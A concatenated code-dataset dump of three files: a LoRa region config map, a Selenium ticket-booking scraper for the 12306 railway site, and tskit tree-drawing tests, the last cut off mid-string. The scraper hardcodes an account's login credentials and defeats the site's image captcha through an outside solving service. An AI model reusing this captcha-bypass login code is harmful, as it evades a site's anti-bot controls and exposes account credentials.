] | null | null | null | pktfwd/config/region_config_filenames.py | KevinWassermann94/hm-pktfwd | 57f52a507759c57a4fe0a6baeb315cf3cb9e668f | [
"MIT"
] | null | null | null | REGION_CONFIG_FILENAMES = {
"AS923_1": "AS923-1-global_conf.json",
"AS923_2": "AS923-2-global_conf.json",
"AS923_3": "AS923-3-global_conf.json",
"AS923_4": "AS923-4-global_conf.json",
"AU915": "AU-global_conf.json",
"CN470": "CN-global_conf.json",
"EU433": "EU433-global_conf.json",
"EU868": "EU-global_conf.json",
"IN865": "IN-global_conf.json",
"KR920": "KR-global_conf.json",
"RU864": "RU-global_conf.json",
"US915": "US-global_conf.json"
}
| 32.8 | 42 | 0.638211 |
795476239b962d6c9d16cb8cc2048f7b2b08fcf8 | 1,990 | py | Python | SpiderExercise/day_04/12306.py | tjhlp/SmallSpider | 5518fbd14d66d3b0aca5ac8871839b7e1de49d47 | [
"MIT"
] | null | null | null | SpiderExercise/day_04/12306.py | tjhlp/SmallSpider | 5518fbd14d66d3b0aca5ac8871839b7e1de49d47 | [
"MIT"
] | null | null | null | SpiderExercise/day_04/12306.py | tjhlp/SmallSpider | 5518fbd14d66d3b0aca5ac8871839b7e1de49d47 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
from selenium import webdriver
import time
from PIL import Image
from io import BytesIO
from selenium.webdriver import ActionChains
from day_04.YDMHTTP import decode
browser = webdriver.Chrome('./chromedriver.exe')
fs = "武汉,WHN"
ts = "深圳,SZQ"
date = "2019-09-03"
base_url = 'https://kyfw.12306.cn/otn/leftTicket/init?linktypeid=dc&fs={}&ts={}&date={}&flag=N,N,Y'
browser.get(base_url.format(fs, ts, date))
time.sleep(3)
li_elements = browser.find_elements_by_xpath('//tbody[@id="queryLeftTable"]//tr[starts-with(@id,"ticket_")]')
for li_element in li_elements:
name = li_element.find_element_by_class_name('number').text
cdz = li_element.find_element_by_class_name('cdz').text
try:
revers_obj = browser.find_element_by_class_name('btn72')
revers_obj.click()
except:
continue
time.sleep(2)
browser.find_element_by_class_name('login-hd-account').click()
time.sleep(2)
browser.find_element_by_id('J-userName').send_keys('r374586186')
browser.find_element_by_id('J-password').send_keys('t8306418')
img_element = browser.find_element_by_id('J-loginImg')
full_image = browser.get_screenshot_as_png()
img = Image.open(BytesIO(full_image))
scale = 0.7
# 354 207
x1 = img_element.location.get("x") * scale
y1 = img_element.location.get("y")
x2 = x1 + img_element.size.get('width')
y2 = y1 + img_element.size.get('height')
cut_info = (x1, y1, x2, y2)
cut_img = img.crop(cut_info)
cut_img.save('cut.png')
time.sleep(1)
result = decode('cut.png', 6701)
print(result)
positions = [
(40, 70),
(120, 70),
(180, 70),
(260, 70),
(40, 140),
(120, 140),
(180, 140),
(260, 140)
]
for num in result:
position = positions[int(num) - 1]
print(position)
ActionChains(browser).move_to_element_with_offset(img_element, position[0],
position[1]).click().perform()
browser.find_element_by_id('J-login').click()
time.sleep(3)
# browser.quit()
| 26.184211 | 109 | 0.685427 |
79547692c5be877b643e56e3ee1f618e709997d6 | 68,469 | py | Python | python/tests/test_drawing.py | hyanwong/tskit | f1c5e29e2f4ed022a436895cea3e92f21e368ec6 | [
"MIT"
] | null | null | null | python/tests/test_drawing.py | hyanwong/tskit | f1c5e29e2f4ed022a436895cea3e92f21e368ec6 | [
"MIT"
] | null | null | null | python/tests/test_drawing.py | hyanwong/tskit | f1c5e29e2f4ed022a436895cea3e92f21e368ec6 | [
"MIT"
] | null | null | null | # MIT License
#
# Copyright (c) 2018-2019 Tskit Developers
# Copyright (C) 2017 University of Oxford
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
"""
Test cases for visualisation in tskit.
"""
import collections
import io
import math
import os
import re
import tempfile
import xml.dom.minidom
import xml.etree
import msprime
import numpy as np
import pytest
import xmlunittest
import tests.tsutil as tsutil
import tskit
from tskit import drawing
class TestTreeDraw:
"""
Tests for the tree drawing functionality.
"""
def get_binary_tree(self):
ts = msprime.simulate(10, random_seed=1, mutation_rate=1)
return next(ts.trees())
def get_nonbinary_ts(self):
demographic_events = [
msprime.SimpleBottleneck(time=0.1, population=0, proportion=0.5)
]
return msprime.simulate(
10,
recombination_rate=5,
mutation_rate=10,
demographic_events=demographic_events,
random_seed=1,
)
def get_nonbinary_tree(self):
for t in self.get_nonbinary_ts().trees():
for u in t.nodes():
if len(t.children(u)) > 2:
return t
raise AssertionError()
def get_zero_edge_tree(self):
tables = tskit.TableCollection(sequence_length=2)
# These must be samples or we will have zero roots.
tables.nodes.add_row(flags=tskit.NODE_IS_SAMPLE, time=0)
tables.nodes.add_row(flags=tskit.NODE_IS_SAMPLE, time=0)
tables.sites.add_row(position=0, ancestral_state="0")
tables.mutations.add_row(site=0, node=0, derived_state="1")
tables.mutations.add_row(site=0, node=1, derived_state="1")
return tables.tree_sequence().first()
def get_zero_roots_tree(self):
tables = tskit.TableCollection(sequence_length=2)
# If we have no samples we have zero roots
tables.nodes.add_row(time=0)
tables.nodes.add_row(time=0)
tables.nodes.add_row(time=1)
tables.edges.add_row(0, 2, 2, 0)
tables.edges.add_row(0, 2, 2, 1)
tree = tables.tree_sequence().first()
assert tree.num_roots == 0
return tree
def get_multiroot_tree(self):
ts = msprime.simulate(15, random_seed=1)
# Take off the top quarter of edges
tables = ts.dump_tables()
edges = tables.edges
n = len(edges) - len(edges) // 4
edges.set_columns(
left=edges.left[:n],
right=edges.right[:n],
parent=edges.parent[:n],
child=edges.child[:n],
)
ts = tables.tree_sequence()
for t in ts.trees():
if t.num_roots > 1:
return t
raise AssertionError()
def get_mutations_over_roots_tree(self):
ts = msprime.simulate(15, random_seed=1)
ts = tsutil.decapitate(ts, 20)
tables = ts.dump_tables()
delta = 1.0 / (ts.num_nodes + 1)
x = 0
for node in range(ts.num_nodes):
site_id = tables.sites.add_row(x, ancestral_state="0")
x += delta
tables.mutations.add_row(site_id, node=node, derived_state="1")
ts = tables.tree_sequence()
tree = ts.first()
assert any(tree.parent(mut.node) == tskit.NULL for mut in tree.mutations())
return tree
def get_unary_node_tree(self):
ts = msprime.simulate(2, random_seed=1)
tables = ts.dump_tables()
edges = tables.edges
# Take out all the edges except 1
n = 1
edges.set_columns(
left=edges.left[:n],
right=edges.right[:n],
parent=edges.parent[:n],
child=edges.child[:n],
)
ts = tables.tree_sequence()
for t in ts.trees():
for u in t.nodes():
if len(t.children(u)) == 1:
return t
raise AssertionError()
def get_empty_tree(self):
tables = tskit.TableCollection(sequence_length=1)
ts = tables.tree_sequence()
return next(ts.trees())
def get_simple_ts(self):
"""
return a simple tree seq that does not depend on msprime
"""
nodes = io.StringIO(
"""\
id is_sample population individual time metadata
0 1 0 -1 0.00000000000000
1 1 0 -1 0.00000000000000
2 1 0 -1 0.00000000000000
3 1 0 -1 0.00000000000000
4 0 0 -1 0.02445014598813
5 0 0 -1 0.11067965364865
6 0 0 -1 1.75005250750382
7 0 0 -1 2.31067154311640
8 0 0 -1 3.57331354884652
9 0 0 -1 9.08308317451295
"""
)
edges = io.StringIO(
"""\
id left right parent child
0 0.00000000 1.00000000 4 0
1 0.00000000 1.00000000 4 1
2 0.00000000 1.00000000 5 2
3 0.00000000 1.00000000 5 3
4 0.79258618 0.90634460 6 4
5 0.79258618 0.90634460 6 5
6 0.05975243 0.79258618 7 4
7 0.90634460 0.91029435 7 4
8 0.05975243 0.79258618 7 5
9 0.90634460 0.91029435 7 5
10 0.91029435 1.00000000 8 4
11 0.91029435 1.00000000 8 5
12 0.00000000 0.05975243 9 4
13 0.00000000 0.05975243 9 5
"""
)
sites = io.StringIO(
"""\
position ancestral_state
0.05 A
0.06 0
"""
)
mutations = io.StringIO(
"""\
site node derived_state parent
0 9 T -1
0 9 G 0
0 4 1 -1
"""
)
return tskit.load_text(
nodes, edges, sites=sites, mutations=mutations, strict=False
)
def closest_left_node(tree, u):
"""
Returns the node that is closest to u in a left-to-right sense.
"""
ret = tskit.NULL
while u != tskit.NULL and ret == tskit.NULL:
ret = tree.left_sib(u)
u = tree.parent(u)
return ret
def get_left_neighbour(tree, traversal_order):
"""
This is a less efficient version of the get_left_neighbour function in
drawing.py.
"""
# Note: roots are the children of -1 here.
children = collections.defaultdict(list)
for u in tree.nodes(order=traversal_order):
parent = tree.parent(u)
children[parent].append(u)
left_neighbour = np.full(tree.num_nodes, tskit.NULL, dtype=int)
for u in tree.nodes():
next_left = tskit.NULL
child = u
while child != tskit.NULL and next_left == tskit.NULL:
parent = tree.parent(child)
child_index = children[parent].index(child)
if child_index > 0:
next_left = children[parent][child_index - 1]
child = parent
left_neighbour[u] = next_left
return left_neighbour
class TestClosestLeftNode(TestTreeDraw):
"""
Tests the code for finding the closest left node in a tree.
"""
def verify(self, tree):
m1 = drawing.get_left_neighbour(tree, "postorder")
m2 = get_left_neighbour(tree, "postorder")
np.testing.assert_array_equal(m1, m2)
for u in tree.nodes():
assert m1[u] == closest_left_node(tree, u)
m1 = drawing.get_left_neighbour(tree, "minlex_postorder")
m2 = get_left_neighbour(tree, "minlex_postorder")
np.testing.assert_array_equal(m1, m2)
def test_2_binary(self):
ts = msprime.simulate(2, random_seed=2)
self.verify(ts.first())
def test_5_binary(self):
ts = msprime.simulate(5, random_seed=2)
self.verify(ts.first())
def test_10_binary(self):
ts = msprime.simulate(10, random_seed=2)
self.verify(ts.first())
def test_20_binary(self):
ts = msprime.simulate(20, random_seed=3)
self.verify(ts.first())
def test_nonbinary(self):
self.verify(self.get_nonbinary_tree())
def test_zero_edge(self):
self.verify(self.get_zero_edge_tree())
def test_zero_roots(self):
self.verify(self.get_zero_roots_tree())
def test_multiroot(self):
self.verify(self.get_multiroot_tree())
def test_left_child(self):
t = self.get_nonbinary_tree()
left_child = drawing.get_left_child(t, "postorder")
for u in t.nodes(order="postorder"):
if t.num_children(u) > 0:
assert left_child[u] == t.children(u)[0]
def test_null_node_left_child(self):
t = self.get_nonbinary_tree()
left_child = drawing.get_left_child(t, "minlex_postorder")
assert left_child[tskit.NULL] == tskit.NULL
def test_leaf_node_left_child(self):
t = self.get_nonbinary_tree()
left_child = drawing.get_left_child(t, "minlex_postorder")
for u in t.samples():
assert left_child[u] == tskit.NULL
class TestOrder(TestTreeDraw):
"""
Tests for using the different node orderings.
"""
def test_bad_order(self):
for bad_order in [("sdf"), "sdf", 1234, ""]:
with pytest.raises(ValueError):
drawing.check_order(bad_order)
def test_default_order(self):
traversal_order = drawing.check_order(None)
assert traversal_order == "minlex_postorder"
def test_order_mapping(self):
assert drawing.check_order("tree") == "postorder"
assert drawing.check_order("minlex") == "minlex_postorder"
def test_tree_svg_variants(self):
t = self.get_binary_tree()
output1 = t.draw(format="svg")
output2 = t.draw(format="svg", order="minlex")
output3 = t.draw(format="svg", order="tree")
# Default is minlex
assert output1 == output2
# tree is at least different to minlex
assert output1 != output3
# draw_svg gets the same results
assert t.draw_svg() == output1
assert t.draw_svg(order="minlex") == output1
assert t.draw_svg(order="tree") == output3
def test_tree_text_variants(self):
t = self.get_binary_tree()
output1 = t.draw(format="unicode")
output2 = t.draw(format="unicode", order="minlex")
output3 = t.draw(format="unicode", order="tree")
# Default is minlex
assert output1 == output2
# tree is at least different to minlex
assert output1 != output3
# draw_text gets the same results
assert t.draw_text() == output1
assert t.draw_text(order="minlex") == output1
assert t.draw_text(order="tree") == output3
def test_tree_sequence_text_variants(self):
ts = msprime.simulate(10, random_seed=2)
output1 = ts.draw_text()
output2 = ts.draw_text(order="minlex")
output3 = ts.draw_text(order="tree")
# Default is minlex
assert output1 == output2
# tree is at least different to minlex
assert output1 != output3
def test_tree_sequence_svg_variants(self):
ts = msprime.simulate(10, random_seed=2)
output1 = ts.draw_svg()
output2 = ts.draw_svg(order="minlex")
output3 = ts.draw_svg(order="tree")
# Default is minlex
assert output1 == output2
# tree is at least different to minlex
assert output1 != output3
class TestFormats(TestTreeDraw):
"""
Tests that formats are recognised correctly.
"""
def test_svg_variants(self):
t = self.get_binary_tree()
for svg in ["svg", "SVG", "sVg"]:
output = t.draw(format=svg)
root = xml.etree.ElementTree.fromstring(output)
assert root.tag == "{http://www.w3.org/2000/svg}svg"
def test_default(self):
# Default is SVG
t = self.get_binary_tree()
output = t.draw(format=None)
root = xml.etree.ElementTree.fromstring(output)
assert root.tag == "{http://www.w3.org/2000/svg}svg"
output = t.draw()
root = xml.etree.ElementTree.fromstring(output)
assert root.tag == "{http://www.w3.org/2000/svg}svg"
def test_ascii_variants(self):
t = self.get_binary_tree()
for fmt in ["ascii", "ASCII", "AScii"]:
output = t.draw(format=fmt)
with pytest.raises(xml.etree.ElementTree.ParseError):
xml.etree.ElementTree.fromstring(
output,
)
def test_unicode_variants(self):
t = self.get_binary_tree()
for fmt in ["unicode", "UNICODE", "uniCODE"]:
output = t.draw(format=fmt)
with pytest.raises(xml.etree.ElementTree.ParseError):
xml.etree.ElementTree.fromstring(
output,
)
def test_bad_formats(self):
t = self.get_binary_tree()
for bad_format in ["", "ASC", "SV", "jpeg"]:
with pytest.raises(ValueError):
t.draw(format=bad_format)
class TestDrawText(TestTreeDraw):
"""
Tests the ASCII tree drawing method.
"""
drawing_format = "ascii"
example_label = "XXX"
def verify_basic_text(self, text):
assert isinstance(text, str)
# TODO surely something else we can verify about this...
def test_draw_defaults(self):
t = self.get_binary_tree()
text = t.draw(format=self.drawing_format)
self.verify_basic_text(text)
def test_draw_nonbinary(self):
t = self.get_nonbinary_tree()
text = t.draw(format=self.drawing_format)
self.verify_basic_text(text)
def test_draw_multiroot(self):
t = self.get_multiroot_tree()
text = t.draw(format=self.drawing_format)
self.verify_basic_text(text)
def test_draw_mutations_over_roots(self):
t = self.get_mutations_over_roots_tree()
text = t.draw(format=self.drawing_format)
self.verify_basic_text(text)
def test_draw_unary(self):
t = self.get_unary_node_tree()
text = t.draw(format=self.drawing_format)
self.verify_basic_text(text)
def test_draw_empty_tree(self):
t = self.get_empty_tree()
with pytest.raises(ValueError):
t.draw(format=self.drawing_format)
def test_draw_zero_roots_tree(self):
t = self.get_zero_roots_tree()
with pytest.raises(ValueError):
t.draw(format=self.drawing_format)
def test_draw_zero_edge_tree(self):
t = self.get_zero_edge_tree()
text = t.draw(format=self.drawing_format)
self.verify_basic_text(text)
def test_even_num_children_tree(self):
nodes = io.StringIO(
"""\
id is_sample time
0 1 0
1 1 1
2 1 2
3 1 1
4 1 4
5 1 5
6 1 7
"""
)
edges = io.StringIO(
"""\
left right parent child
0 1 6 0
0 1 6 1
0 1 6 2
0 1 6 3
0 1 6 4
0 1 6 5
"""
)
ts = tskit.load_text(nodes, edges, strict=False)
t = next(ts.trees())
text = t.draw(format=self.drawing_format)
self.verify_basic_text(text)
def test_odd_num_children_tree(self):
nodes = io.StringIO(
"""\
id is_sample time
0 1 0
1 1 1
2 1 2
3 1 1
4 1 4
5 1 5
"""
)
edges = io.StringIO(
"""\
left right parent child
0 1 5 0
0 1 5 1
0 1 5 2
0 1 5 3
0 1 5 4
"""
)
ts = tskit.load_text(nodes, edges, strict=False)
t = next(ts.trees())
text = t.draw(format=self.drawing_format)
self.verify_basic_text(text)
def test_node_labels(self):
t = self.get_binary_tree()
labels = {u: self.example_label for u in t.nodes()}
text = t.draw(format=self.drawing_format, node_labels=labels)
self.verify_basic_text(text)
j = 0
for _ in t.nodes():
j = text[j:].find(self.example_label)
assert j != -1
def test_long_internal_labels(self):
t = self.get_binary_tree()
labels = {u: "X" * 10 for u in t.nodes() if t.is_internal(u)}
text = t.draw(format=self.drawing_format, node_labels=labels)
self.verify_basic_text(text)
def test_no_node_labels(self):
t = self.get_binary_tree()
labels = {}
text = t.draw(format=self.drawing_format, node_labels=labels)
self.verify_basic_text(text)
for u in t.nodes():
assert text.find(str(u)) == -1
def test_unused_args(self):
t = self.get_binary_tree()
with pytest.raises(ValueError):
t.draw(format=self.drawing_format, width=300)
with pytest.raises(ValueError):
t.draw(format=self.drawing_format, height=300)
with pytest.raises(ValueError):
t.draw(format=self.drawing_format, mutation_labels={})
with pytest.raises(ValueError):
t.draw(format=self.drawing_format, mutation_colours={})
with pytest.raises(ValueError):
t.draw(format=self.drawing_format, edge_colours={})
with pytest.raises(ValueError):
t.draw(format=self.drawing_format, node_colours={})
with pytest.raises(ValueError):
t.draw(format=self.drawing_format, max_tree_height=1234)
with pytest.raises(ValueError):
t.draw(format=self.drawing_format, tree_height_scale="time")
class TestDrawUnicode(TestDrawText):
"""
Tests the Unicode tree drawing method
"""
drawing_format = "unicode"
example_label = "\u20ac" * 10 # euro symbol
class TestDrawTextErrors:
"""
Tests for errors occuring in tree drawing code.
"""
def test_bad_orientation(self):
t = msprime.simulate(5, mutation_rate=0.1, random_seed=2).first()
for bad_orientation in ["", "leftright", "sdf"]:
with pytest.raises(ValueError):
t.draw_text(orientation=bad_orientation)
class TestDrawTextExamples(TestTreeDraw):
"""
Verify that we get the correct rendering for some examples.
"""
def verify_text_rendering(self, drawn, drawn_tree, debug=False):
if debug:
print("Drawn:")
print(drawn)
print("Expected:")
print(drawn_tree)
tree_lines = drawn_tree.splitlines()
drawn_lines = drawn.splitlines()
assert len(tree_lines) == len(drawn_lines)
for l1, l2 in zip(tree_lines, drawn_lines):
# Trailing white space isn't significant.
assert l1.rstrip() == l2.rstrip()
def test_simple_tree(self):
nodes = io.StringIO(
"""\
id is_sample time
0 1 0
1 1 0
2 1 2
"""
)
edges = io.StringIO(
"""\
left right parent child
0 1 2 0
0 1 2 1
"""
)
tree = (
# fmt: off
" 2 \n"
"┏┻┓\n"
"0 1"
# fmt: on
)
ts = tskit.load_text(nodes, edges, strict=False)
t = next(ts.trees())
drawn = t.draw(format="unicode", order="tree")
self.verify_text_rendering(drawn, tree)
drawn = t.draw_text()
self.verify_text_rendering(drawn, tree)
tree = (
# fmt: off
" 2 \n"
"+++\n"
"0 1\n"
# fmt: on
)
drawn = t.draw_text(use_ascii=True, order="tree")
self.verify_text_rendering(drawn, tree)
tree = (
# fmt: off
" ┏0\n"
"2┫ \n"
" ┗1\n"
# fmt: on
)
drawn = t.draw_text(orientation="left", order="tree")
self.verify_text_rendering(drawn, tree)
tree = (
# fmt: off
" +0\n"
"2+ \n"
" +1\n"
# fmt: on
)
drawn = t.draw_text(orientation="left", use_ascii=True, order="tree")
self.verify_text_rendering(drawn, tree)
def test_simple_tree_long_label(self):
nodes = io.StringIO(
"""\
id is_sample time
0 1 0
1 1 0
2 1 2
"""
)
edges = io.StringIO(
"""\
left right parent child
0 1 2 0
0 1 2 1
"""
)
tree = (
# fmt: off
"ABCDEF\n"
"┏┻┓ \n"
"0 1 \n"
# fmt: on
)
ts = tskit.load_text(nodes, edges, strict=False)
t = next(ts.trees())
drawn = t.draw_text(node_labels={0: "0", 1: "1", 2: "ABCDEF"}, order="tree")
self.verify_text_rendering(drawn, tree)
tree = (
# fmt: off
"0┓ \n"
" ┣ABCDEF\n"
"1┛ \n"
# fmt: on
)
drawn = t.draw_text(
node_labels={0: "0", 1: "1", 2: "ABCDEF"}, orientation="right", order="tree"
)
self.verify_text_rendering(drawn, tree)
drawn = t.draw_text(
node_labels={0: "ABCDEF", 1: "1", 2: "2"}, orientation="right", order="tree"
)
tree = (
# fmt: off
"ABCDEF┓ \n"
" ┣2\n"
"1━━━━━┛ \n"
# fmt: on
)
self.verify_text_rendering(drawn, tree)
tree = (
# fmt: off
" ┏0\n"
"ABCDEF┫ \n"
" ┗1\n"
# fmt: on
)
drawn = t.draw_text(
node_labels={0: "0", 1: "1", 2: "ABCDEF"}, orientation="left", order="tree"
)
self.verify_text_rendering(drawn, tree)
def test_four_leaves(self):
nodes = io.StringIO(
"""\
id is_sample population individual time metadata
0 1 0 -1 0.00000000000000
1 1 0 -1 0.00000000000000
2 1 0 -1 0.00000000000000
3 1 0 -1 0.00000000000000
4 0 0 -1 0.26676079696421
5 0 0 -1 1.48826948286480
6 0 0 -1 2.91835007758007
"""
)
edges = io.StringIO(
"""\
left right parent child
0.00000000 1.00000000 4 0
0.00000000 1.00000000 4 3
0.00000000 1.00000000 5 2
0.00000000 1.00000000 5 4
0.00000000 1.00000000 6 1
0.00000000 1.00000000 6 5
"""
)
tree = (
" 6 \n"
"┏━┻━┓ \n"
"┃ 5 \n"
"┃ ┏━┻┓ \n"
"┃ ┃ 4 \n"
"┃ ┃ ┏┻┓ \n"
"1 2 0 3 \n"
)
ts = tskit.load_text(nodes, edges, strict=False)
t = ts.first()
drawn = t.draw(format="unicode", order="tree")
self.verify_text_rendering(drawn, tree)
self.verify_text_rendering(t.draw_text(order="tree"), tree)
drawn = t.draw_text(orientation="bottom", order="tree")
tree = (
"1 2 0 3\n"
"┃ ┃ ┗┳┛\n"
"┃ ┃ 4 \n"
"┃ ┗━┳┛ \n"
"┃ 5 \n"
"┗━┳━┛ \n"
" 6 \n"
)
self.verify_text_rendering(drawn, tree)
tree = (
" ┏━━━━1\n"
" ┃ \n"
"6┫ ┏━━2\n"
" ┃ ┃ \n"
" ┗5┫ ┏0\n"
" ┗4┫ \n"
" ┗3\n"
)
self.verify_text_rendering(t.draw_text(orientation="left", order="tree"), tree)
tree = (
"2.92┊ 6 ┊\n"
" ┊ ┏━┻━┓ ┊\n"
"1.49┊ ┃ 5 ┊\n"
" ┊ ┃ ┏━┻┓ ┊\n"
"0.27┊ ┃ ┃ 4 ┊\n"
" ┊ ┃ ┃ ┏┻┓ ┊\n"
"0.00┊ 1 2 0 3 ┊\n"
" 0.00 1.00\n"
)
self.verify_text_rendering(ts.draw_text(order="tree"), tree)
tree = (
" 6 \n"
"+-+-+ \n"
"| 5 \n"
"| +-++ \n"
"| | 4 \n"
"| | +++\n"
"1 2 0 3\n"
)
drawn = t.draw(format="ascii", order="tree")
self.verify_text_rendering(drawn, tree)
tree = (
" 6 \n"
"┏━┻━┓ \n"
"┃xxxxxxxxxx\n"
"┃ ┏━┻┓ \n"
"┃ ┃ 4 \n"
"┃ ┃ ┏┻┓ \n"
"1 2 0 3 \n"
)
labels = {u: str(u) for u in t.nodes()}
labels[5] = "xxxxxxxxxx"
drawn = t.draw_text(node_labels=labels, order="tree")
self.verify_text_rendering(drawn, tree)
tree = (
" ┏━━━━━━━━━━━━━1\n"
" ┃ \n"
"6┫ ┏━━2\n"
" ┃ ┃ \n"
" ┗xxxxxxxxxx┫ ┏0\n"
" ┗4┫ \n"
" ┗3\n"
)
drawn = t.draw_text(node_labels=labels, orientation="left", order="tree")
self.verify_text_rendering(drawn, tree)
tree = (
"2.92┊ 6 ┊\n"
" ┊ ┏━┻━┓ ┊\n"
"1.49┊ ┃xxxxxxxxxx ┊\n"
" ┊ ┃ ┏━┻┓ ┊\n"
"0.27┊ ┃ ┃ 4 ┊\n"
" ┊ ┃ ┃ ┏┻┓ ┊\n"
"0.00┊ 1 2 0 3 ┊\n"
" 0.00 1.00\n"
)
drawn = ts.draw_text(node_labels=labels, order="tree")
self.verify_text_rendering(drawn, tree)
def test_trident_tree(self):
nodes = io.StringIO(
"""\
id is_sample time
0 1 0
1 1 0
2 1 0
3 1 2
"""
)
edges = io.StringIO(
"""\
left right parent child
0 1 3 0
0 1 3 1
0 1 3 2
"""
)
tree = (
# fmt: off
" 3 \n"
"┏━╋━┓\n"
"0 1 2\n"
# fmt: on
)
ts = tskit.load_text(nodes, edges, strict=False)
t = next(ts.trees())
drawn = t.draw(format="unicode", order="tree")
self.verify_text_rendering(drawn, tree)
self.verify_text_rendering(t.draw_text(), tree)
tree = (
# fmt: off
" ┏0\n"
" ┃\n"
"3╋1\n"
" ┃\n"
" ┗2\n"
# fmt: on
)
drawn = t.draw_text(orientation="left")
self.verify_text_rendering(drawn, tree)
tree = (
# fmt: off
"0┓\n"
" ┃\n"
"1╋3\n"
" ┃\n"
"2┛\n"
# fmt: on
)
drawn = t.draw_text(orientation="right")
self.verify_text_rendering(drawn, tree)
def test_pitchfork_tree(self):
nodes = io.StringIO(
"""\
id is_sample time
0 1 0
1 1 0
2 1 0
3 1 0
4 1 2
"""
)
edges = io.StringIO(
"""\
left right parent child
0 1 4 0
0 1 4 1
0 1 4 2
0 1 4 3
"""
)
ts = tskit.load_text(nodes, edges, strict=False)
t = next(ts.trees())
tree = (
# fmt: off
" 4 \n"
"┏━┳┻┳━┓\n"
"0 1 2 3\n"
# fmt: on
)
drawn = t.draw(format="unicode", order="tree")
self.verify_text_rendering(drawn, tree)
self.verify_text_rendering(t.draw_text(), tree)
# No labels
tree = (
# fmt: off
" ┃ \n"
"┏━┳┻┳━┓\n"
"┃ ┃ ┃ ┃\n"
# fmt: on
)
drawn = t.draw(format="unicode", node_labels={}, order="tree")
self.verify_text_rendering(drawn, tree)
self.verify_text_rendering(t.draw_text(node_labels={}), tree)
# Some labels
tree = (
# fmt: off
" ┃ \n"
"┏━┳┻┳━┓\n"
"0 ┃ ┃ 3\n"
# fmt: on
)
labels = {0: "0", 3: "3"}
drawn = t.draw(format="unicode", node_labels=labels, order="tree")
self.verify_text_rendering(drawn, tree)
self.verify_text_rendering(t.draw_text(node_labels=labels), tree)
tree = (
# fmt: off
" ┏0\n"
" ┃\n"
" ┣1\n"
"4┫\n"
" ┣2\n"
" ┃\n"
" ┗3\n"
# fmt: on
)
drawn = t.draw_text(orientation="left")
self.verify_text_rendering(drawn, tree)
tree = (
# fmt: off
"0┓\n"
" ┃\n"
"1┫\n"
" ┣4\n"
"2┫\n"
" ┃\n"
"3┛\n"
# fmt: on
)
drawn = t.draw_text(orientation="right")
self.verify_text_rendering(drawn, tree)
def test_stick_tree(self):
nodes = io.StringIO(
"""\
id is_sample time
0 1 0
1 1 1
2 1 2
"""
)
edges = io.StringIO(
"""\
left right parent child
0 1 1 0
0 1 2 1
"""
)
tree = (
# fmt: off
"2\n"
"┃\n"
"1\n"
"┃\n"
"0\n"
# fmt: on
)
ts = tskit.load_text(nodes, edges, strict=False)
t = next(ts.trees())
drawn = t.draw(format="unicode", order="tree")
self.verify_text_rendering(drawn, tree)
self.verify_text_rendering(t.draw_text(), tree)
tree = (
# fmt: off
"0\n"
"┃\n"
"1\n"
"┃\n"
"2\n"
# fmt: on
)
drawn = t.draw_text(orientation="bottom")
self.verify_text_rendering(drawn, tree)
tree = "2━1━0\n"
drawn = t.draw_text(orientation="left")
self.verify_text_rendering(drawn, tree)
tree = "0━1━2\n"
drawn = t.draw_text(orientation="right")
self.verify_text_rendering(drawn, tree)
def test_draw_forky_tree(self):
tree = (
" 14 \n"
" ┏━━━━┻━━━━┓ \n"
" ┃ 13 \n"
" ┃ ┏━┳━┳━╋━┳━━┓ \n"
" ┃ ┃ ┃ ┃ ┃ ┃ 12 \n"
" ┃ ┃ ┃ ┃ ┃ ┃ ┏┻┓ \n"
" 11 ┃ ┃ ┃ ┃ ┃ ┃ ┃ \n"
"┏━┻┓ ┃ ┃ ┃ ┃ ┃ ┃ ┃ \n"
"┃ 10 ┃ ┃ ┃ ┃ ┃ ┃ ┃ \n"
"┃ ┏┻┓ ┃ ┃ ┃ ┃ ┃ ┃ ┃ \n"
"8 0 3 2 4 5 6 9 1 7 \n"
)
nodes = io.StringIO(
"""\
id is_sample population individual time metadata
0 1 0 -1 0.00000000000000
1 1 0 -1 0.00000000000000
2 1 0 -1 0.00000000000000
3 1 0 -1 0.00000000000000
4 1 0 -1 0.00000000000000
5 1 0 -1 0.00000000000000
6 1 0 -1 0.00000000000000
7 1 0 -1 0.00000000000000
8 1 0 -1 0.00000000000000
9 1 0 -1 0.00000000000000
10 0 0 -1 0.02398248117831
11 0 0 -1 0.17378680550869
12 0 0 -1 0.19950200178411
13 0 0 -1 0.20000000000000
14 0 0 -1 5.68339203134457
"""
)
edges = io.StringIO(
"""\
left right parent child
0.00000000 1.00000000 10 0
0.00000000 1.00000000 10 3
0.00000000 1.00000000 11 8
0.00000000 1.00000000 11 10
0.00000000 1.00000000 12 1
0.00000000 1.00000000 12 7
0.00000000 1.00000000 13 2
0.00000000 1.00000000 13 4
0.00000000 1.00000000 13 5
0.00000000 1.00000000 13 6
0.00000000 1.00000000 13 9
0.00000000 1.00000000 13 12
0.00000000 1.00000000 14 11
0.00000000 1.00000000 14 13
"""
)
ts = tskit.load_text(nodes, edges, strict=False)
t = next(ts.trees())
drawn = t.draw(format="unicode", order="tree")
self.verify_text_rendering(drawn, tree)
self.verify_text_rendering(t.draw_text(order="tree"), tree)
tree = (
" 14 \n"
" ┏━━━━━━┻━━━━━━┓ \n"
" ┃ 13 \n"
" ┃ ┏━┳━┳┻┳━┳━━┓ \n"
" ┃ ┃ ┃ ┃ ┃ ┃ 12 \n"
" ┃ ┃ ┃ ┃ ┃ ┃ ┏┻┓\n"
"x11xxxxxxx ┃ ┃ ┃ ┃ ┃ ┃ ┃\n"
"┏━┻┓ ┃ ┃ ┃ ┃ ┃ ┃ ┃\n"
